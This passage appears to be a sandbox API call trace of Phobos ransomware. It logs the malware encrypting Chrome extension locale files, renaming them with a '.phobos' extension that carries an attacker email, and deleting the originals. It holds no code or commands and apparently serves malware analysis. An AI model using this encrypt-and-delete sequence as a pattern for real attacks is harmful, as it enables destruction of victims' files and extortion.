phKey=0x2a0fac0*=0xa32c28) returned 1 [0151.729] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.729] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0151.729] CryptDestroyKey (hKey=0xa32c28) returned 1 [0151.729] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0151.729] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.729] CloseHandle (hObject=0x188) returned 1 [0151.729] CloseHandle (hObject=0x148) returned 1 [0151.729] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\messages.json")) returned 1 [0151.730] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0151.730] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0151.730] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=179) returned 1 [0151.730] CloseHandle (hObject=0x148) returned 1 [0151.731] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json")) returned 0x2020 [0151.731] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.731] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0151.731] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.731] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.731] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0151.731] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32da8) returned 1 [0151.731] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.731] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xb3, lpOverlapped=0x0) returned 1 [0151.732] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0, dwBufLen=0xc0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0) returned 1 [0151.732] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xc0, lpOverlapped=0x0) returned 1 [0151.733] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32c28) returned 1 [0151.733] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.733] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0151.733] CryptDestroyKey (hKey=0xa32c28) returned 1 [0151.733] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0151.733] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.733] CloseHandle (hObject=0x148) returned 1 [0151.907] CloseHandle (hObject=0x188) returned 1 [0151.908] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\messages.json")) returned 1 [0151.909] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0151.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0151.910] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=179) returned 1 [0151.910] CloseHandle (hObject=0x188) returned 1 [0151.910] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json")) returned 0x2020 [0151.910] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0151.910] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.910] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0151.911] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0151.911] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.911] ReadFile (in: hFile=0x188, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xb3, lpOverlapped=0x0) returned 1 [0151.912] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0, dwBufLen=0xc0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0) returned 1 [0151.913] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xc0, lpOverlapped=0x0) returned 1 [0151.914] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0151.914] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.914] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0151.914] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.914] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0151.914] CryptDestroyKey (hKey=0xa32c28) returned 1 [0151.914] CloseHandle (hObject=0x188) returned 1 [0151.914] CloseHandle (hObject=0x148) returned 1 [0151.914] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sk\\messages.json")) returned 1 [0151.916] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0151.916] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0151.916] GetFileSizeEx (in: hFile=0x148, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=179) returned 1 [0151.916] CloseHandle (hObject=0x148) returned 1 [0151.917] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json")) returned 0x2020 [0151.917] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0151.917] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.917] SetFilePointerEx (in: hFile=0x148, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0151.918] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0151.918] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.918] ReadFile (in: hFile=0x148, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xb3, lpOverlapped=0x0) returned 1 [0151.919] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0, dwBufLen=0xc0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0) returned 1 [0151.919] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xc0, lpOverlapped=0x0) returned 1 [0151.920] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0151.920] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.920] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0151.920] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.920] WriteFile (in: hFile=0x188, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0151.921] CryptDestroyKey (hKey=0xa32c28) returned 1 [0151.921] CloseHandle (hObject=0x148) returned 1 [0151.921] CloseHandle (hObject=0x188) returned 1 [0151.921] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sl\\messages.json")) returned 1 [0151.923] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0151.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0151.923] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=179) returned 1 [0151.923] CloseHandle (hObject=0x188) returned 1 [0151.924] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json")) returned 0x2020 [0151.924] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0151.924] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.924] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0151.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x148 [0151.925] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32c28) returned 1 [0151.925] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.925] ReadFile (in: hFile=0x188, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xb3, lpOverlapped=0x0) returned 1 [0151.926] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0, dwBufLen=0xc0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xc0) returned 1 [0151.926] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xc0, lpOverlapped=0x0) returned 1 [0151.928] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32d28) returned 1 [0151.928] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0151.928] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0151.928] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.928] WriteFile (in: hFile=0x148, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0151.928] CryptDestroyKey (hKey=0xa32c28) returned 1 [0151.928] CloseHandle (hObject=0x188) returned 1 [0151.928] CloseHandle (hObject=0x148) returned 1 [0151.928] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json")) returned 1 [0151.929] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0151.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 